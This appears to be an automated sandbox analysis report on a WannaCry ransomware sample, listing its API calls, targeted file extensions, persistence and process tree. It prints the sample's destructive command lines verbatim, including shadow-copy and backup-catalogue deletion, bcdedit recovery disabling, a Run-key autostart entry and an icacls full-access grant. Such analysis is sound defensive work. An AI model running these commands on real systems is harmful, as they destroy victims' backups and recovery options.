Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_100011D0 wcsrchr,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,GlobalAlloc,GetTokenInformation,LoadLibraryA,GetProcAddress,wcscpy,GlobalFree,5_2_100011D0
Generates new code (likely due to unpacking of malware or shellcode)Show sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode execution: Found new code
PE file contains an invalid checksumShow sources
Source: tasksche.exe.3048.drStatic PE information: real checksum: 0x0 should be: 0x363012
Source: mssecsvc.exeStatic PE information: real checksum: 0x0 should be: 0x394136
Source: tasksche.exe.3216.drStatic PE information: real checksum: 0x0 should be: 0x363012
PE file contains sections with non-standard namesShow sources
Source: libeay32.dll.3408.drStatic PE information: section name: /4
Source: libeay32.dll.3408.drStatic PE information: section name: /19
Source: libeay32.dll.3408.drStatic PE information: section name: /31
Source: libeay32.dll.3408.drStatic PE information: section name: /45
Source: libeay32.dll.3408.drStatic PE information: section name: /57
Source: libeay32.dll.3408.drStatic PE information: section name: /70
Source: libeay32.dll.3408.drStatic PE information: section name: /81
Source: libeay32.dll.3408.drStatic PE information: section name: /92
Source: libevent-2-0-5.dll.3408.drStatic PE information: section name: /4
Source: libevent-2-0-5.dll.3408.drStatic PE information: section name: /19
Source: libevent-2-0-5.dll.3408.drStatic PE information: section name: /31
Source: libevent-2-0-5.dll.3408.drStatic PE information: section name: /45
Source: libevent-2-0-5.dll.3408.drStatic PE information: section name: /57
Source: libevent-2-0-5.dll.3408.drStatic PE information: section name: /70
Source: libevent-2-0-5.dll.3408.drStatic PE information: section name: /81
Source: libevent-2-0-5.dll.3408.drStatic PE information: section name: /92
Source: libevent_core-2-0-5.dll.3408.drStatic PE information: section name: /4
Source: libevent_core-2-0-5.dll.3408.drStatic PE information: section name: /19
Source: libevent_core-2-0-5.dll.3408.drStatic PE information: section name: /31
Source: libevent_core-2-0-5.dll.3408.drStatic PE information: section name: /45
Source: libevent_core-2-0-5.dll.3408.drStatic PE information: section name: /57
Source: libevent_core-2-0-5.dll.3408.drStatic PE information: section name: /70
Source: libevent_core-2-0-5.dll.3408.drStatic PE information: section name: /81
Source: libevent_core-2-0-5.dll.3408.drStatic PE information: section name: /92

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10002300 CloseHandle,SHGetFolderPathW,??2@YAPAXI@Z,swprintf,FindFirstFileW,??3@YAXPAX@Z,??3@YAXPAX@Z,wcscmp,wcscmp,wcscmp,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcscmp,wcscmp,wcscmp,wcsncpy,wcsncpy,wcsncpy,FindNextFileW,FindClose,_wcsnicmp,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,5_2_10002300
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10004A40 CloseHandle,SHGetFolderPathW,wcslen,SHGetFolderPathW,SHGetFolderPathW,wcslen,wcsrchr,wcschr,SHGetFolderPathW,wcslen,wcsrchr,swprintf,FindFirstFileW,wcscmp,wcscmp,swprintf,wcscmp,swprintf,FindNextFileW,FindClose,5_2_10004A40
Source: C:\ProgramData\ywepvofkuzu108\taskdl.exeCode function: 10_2_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,10_2_00401080
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,14_2_004080C0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,14_2_004026B0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,14_2_00403CB0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 18_1_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,18_1_004080C0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 18_1_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,swprintf,#825,#825,18_1_004026B0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 18_1_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,18_1_00403CB0
Source: C:\ProgramData\ywepvofkuzu108\taskdl.exeCode function: 23_1_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,23_1_00401080
Creates COM task schedule object (often to register a task for autostart)Show sources
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Enumerates the file systemShow sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile opened: C:\Users\All Users\Adobe\Acrobat\11.0\~SD874C.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile opened: C:\Users\All Users\Adobe\Acrobat\~SD874B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile opened: C:\Users\All Users\~SD8739.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile opened: C:\Users\All Users\Adobe\Acrobat\11.0\Replicate\Security\~SD874E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile opened: C:\Users\All Users\Adobe\Acrobat\11.0\Replicate\~SD874D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile opened: C:\Users\All Users\Adobe\~SD874A.tmp
Shows file infection / information gathering behavior (enumerates multiple directory for files)Show sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeDirectory queried: number of queries: 1017

System Summary:

barindex
Executable creates window controls seldom found in malwareShow sources
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeWindow found: window name: RICHEDIT
Uses Rich Edit ControlsShow sources
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeFile opened: C:\Windows\system32\RICHED32.DLL
Submission file is bigger than most known malware samplesShow sources
Source: mssecsvc.exeStatic file information: File size 3723264 > 1048576
PE file has a big raw sectionShow sources
Source: mssecsvc.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x35b000
Binary contains paths to development resourcesShow sources
Source: tasksche.exe, mssecsvc.exeBinary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
Source: tasksche.exeBinary or memory string: .der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.edb.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.dotx.dotm.dot.docm.docb.jpg.jpeg.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.eml.msg.ost.pst.pptx.ppt.xlsx.xls.docx.doc%s\%d%s.WNCRYT%s%sTWANACRY!.WNCRY.WNCYR\\@WanaDecryptor@.bmp@WanaDecryptor@.exe.lnk@Please_Read_Me@.txt%s\%s...%s\*.dll.exe~SD@WanaDecryptor@.exeContent.IE5Temporary Internet Files This folder protects against ransomware. Modifying it will reduce protection\Local Settings\Temp\Ap
Source: @WanaDecryptor@.exeBinary or memory string: A.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docConnecting to server...s.wnry%08X.eky%08X.res00000000.resrb%08X.dky%08X.pkyConnectedSent requestSucceedReceived responseCongratulations! Your payment has been checked!
Classification labelShow sources
Source: classification engineClassification label: mal100.evad.rans.phis.spyw.troj.winEXE@57/432@2/8
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\ProgramData\ywepvofkuzu108\taskse.exeCode function: 21_2_00401000 Sleep,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,AdjustTokenPrivileges,_local_unwind2,CreateProcessAsUserA,WaitForSingleObject,_local_unwind2,21_2_00401000
Source: C:\ProgramData\ywepvofkuzu108\taskse.exeCode function: 21_2_00401398 Sleep,AdjustTokenPrivileges,21_2_00401398
Source: C:\ProgramData\ywepvofkuzu108\taskse.exeCode function: 38_1_00401000 Sleep,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,AdjustTokenPrivileges,_local_unwind2,CreateProcessAsUserA,WaitForSingleObject,_local_unwind2,38_1_00401000
Source: C:\ProgramData\ywepvofkuzu108\taskse.exeCode function: 38_1_00401398 Sleep,AdjustTokenPrivileges,38_1_00401398
Contains functionality to check free disk spaceShow sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10005540 GetDriveTypeW,InterlockedExchangeAdd,GetDiskFreeSpaceExW,Sleep,GetDiskFreeSpaceExW,Sleep,GetDriveTypeW,GetDriveTypeW,GetDriveTypeW,GetDriveTypeW,InterlockedExchange,GetDriveTypeW,5_2_10005540
Contains functionality to create servicesShow sources
Source: C:\mssecsvc.exeCode function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_00407C40
Source: C:\Windows\tasksche.exeCode function: OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,sprintf,CreateServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,3_2_00401CE8
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\mssecsvc.exeCode function: 0_2_00407CE0 InternetCloseHandle,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,FindResourceA,LoadResource,LockResource,SizeofResource,sprintf,sprintf,sprintf,MoveFileExA,CreateFileA,WriteFile,CloseHandle,CreateProcessA,CloseHandle,CloseHandle,0_2_00407CE0
Contains functionality to modify services (start/stop/modify)Show sources
Source: C:\mssecsvc.exeCode function: 0_2_00407FA0 ChangeServiceConfig2A,0_2_00407FA0
Contains functionality to register a service control handler (likely the sample is a service DLL)Show sources
Source: C:\mssecsvc.exeCode function: 0_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,0_2_00408090
Creates files inside the program directoryShow sources
Source: C:\Windows\tasksche.exeFile created: C:\ProgramData\ywepvofkuzu108
Creates files inside the user directoryShow sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\Default\Desktop\~SD8694.tmp
Creates temporary filesShow sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\RAC\Temp\~SD887B.tmp
Executes batch filesShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c 239891494608079.bat
Executes visual basic scriptsShow sources
Source: unknownProcess created: C:\Windows\System32\cscript.exe cscript.exe //nologo m.vbs
Found command line outputShow sources
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a..v..0.............................................+'...2"........v.....@..........x...............
Source: C:\Windows\System32\cmd.exeConsole Write: ........l#..........T.h.e. .b.a.t.c.h. .f.i.l.e. .c.a.n.n.o.t. .b.e. .f.o.u.n.d...........+........v..+.B...`...........
Source: C:\Windows\System32\reg.exeConsole Write: ........a..v..0.....T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y...........#.N...p.........#.
Source: C:\Windows\System32\vssadmin.exeConsole Write: ............`.......................a..v..0.....4...@...D....W..............................................S<..........
Source: C:\Windows\System32\vssadmin.exeConsole Write: ..............H.....N.o. .i.t.e.m.s. .f.o.u.n.d. .t.h.a.t. .s.a.t.i.s.f.y. .t.h.e. .q.u.e.r.y...........P...S<..........
Source: C:\Windows\System32\bcdedit.exeConsole Write: ...........v........T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.............N.........Bw.dBw
Source: C:\Windows\System32\bcdedit.exeConsole Write: ...........v........T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........@...N.........Bw.dBw
Source: C:\Windows\System32\wbadmin.exeConsole Write: ........PYBw..........%...%.O..............................v.....'.@p.%.........W.5u.....'.@p.%.........................
Source: C:\Windows\System32\wbadmin.exeConsole Write: ........PYBwh.......Bo&.@o&.4.......h......................v.....(.@..&.....h...W.5u.....(.@..&.t.......f...............
PE file has an executable .text section and no other executable sectionShow sources
Source: mssecsvc.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini filesShow sources
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeFile read: C:\Windows\win.ini
Reads software policiesShow sources
Source: C:\mssecsvc.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processesShow sources
Source: unknownProcess created: C:\mssecsvc.exe 'C:\mssecsvc.exe'
Source: unknownProcess created: C:\mssecsvc.exe C:\mssecsvc.exe -m security
Source: unknownProcess created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /i
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 'C:\ProgramData\ywepvofkuzu108\tasksche.exe'
Source: unknownProcess created: C:\ProgramData\ywepvofkuzu108\tasksche.exe C:\ProgramData\ywepvofkuzu108\tasksche.exe
Source: unknownProcess created: C:\Windows\System32\attrib.exe attrib +h .
Source: unknownProcess created: C:\Windows\System32\icacls.exe icacls . /grant Everyone:F /T /C /Q
Source: unknownProcess created: C:\ProgramData\ywepvofkuzu108\taskdl.exe taskdl.exe
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c 239891494608079.bat
Source: unknownProcess created: C:\Windows\System32\cscript.exe cscript.exe //nologo m.vbs
Source: unknownProcess created: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe @WanaDecryptor@.exe co
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start /b @WanaDecryptor@.exe vs
Source: unknownProcess created: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe @WanaDecryptor@.exe vs
Source: unknownProcess created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe TaskData\Tor\taskhsvc.exe
Source: unknownProcess created: C:\ProgramData\ywepvofkuzu108\taskse.exe taskse.exe C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 'ywepvofkuzu108' /t REG_SZ /d '\'C:\ProgramData\ywepvofkuzu108\tasksche.exe\'' /f
Source: unknownProcess created: C:\ProgramData\ywepvofkuzu108\taskdl.exe taskdl.exe
Source: unknownProcess created: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Source: unknownProcess created: C:\Windows\System32\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 'ywepvofkuzu108' /t REG_SZ /d '\'C:\ProgramData\ywepvofkuzu108\tasksche.exe\'' /f
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: unknownProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Source: unknownProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
Source: unknownProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
Source: unknownProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
Source: unknownProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
Source: unknownProcess created: C:\Windows\System32\wbengine.exe C:\Windows\system32\wbengine.exe
Source: unknownProcess created: C:\ProgramData\ywepvofkuzu108\taskdl.exe taskdl.exe
Source: unknownProcess created: C:\ProgramData\ywepvofkuzu108\taskse.exe taskse.exe C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Source: unknownProcess created: C:\Windows\System32\vdsldr.exe C:\Windows\System32\vdsldr.exe -Embedding
Source: C:\mssecsvc.exeProcess created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /i
Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\ywepvofkuzu108\tasksche.exe C:\ProgramData\ywepvofkuzu108\tasksche.exe
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: C:\Windows\System32\attrib.exe attrib +h .
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: C:\Windows\System32\icacls.exe icacls . /grant Everyone:F /T /C /Q
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: C:\ProgramData\ywepvofkuzu108\taskdl.exe taskdl.exe
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c 239891494608079.bat
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe @WanaDecryptor@.exe co
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start /b @WanaDecryptor@.exe vs
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: C:\ProgramData\ywepvofkuzu108\taskse.exe taskse.exe C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 'ywepvofkuzu108' /t REG_SZ /d '\'C:\ProgramData\ywepvofkuzu108\tasksche.exe\'' /f
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: C:\ProgramData\ywepvofkuzu108\taskdl.exe taskdl.exe
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: C:\ProgramData\ywepvofkuzu108\taskdl.exe taskdl.exe
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: C:\ProgramData\ywepvofkuzu108\taskse.exe taskse.exe C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: unknown unknown
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript.exe //nologo m.vbs
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeProcess created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe TaskData\Tor\taskhsvc.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe @WanaDecryptor@.exe vs
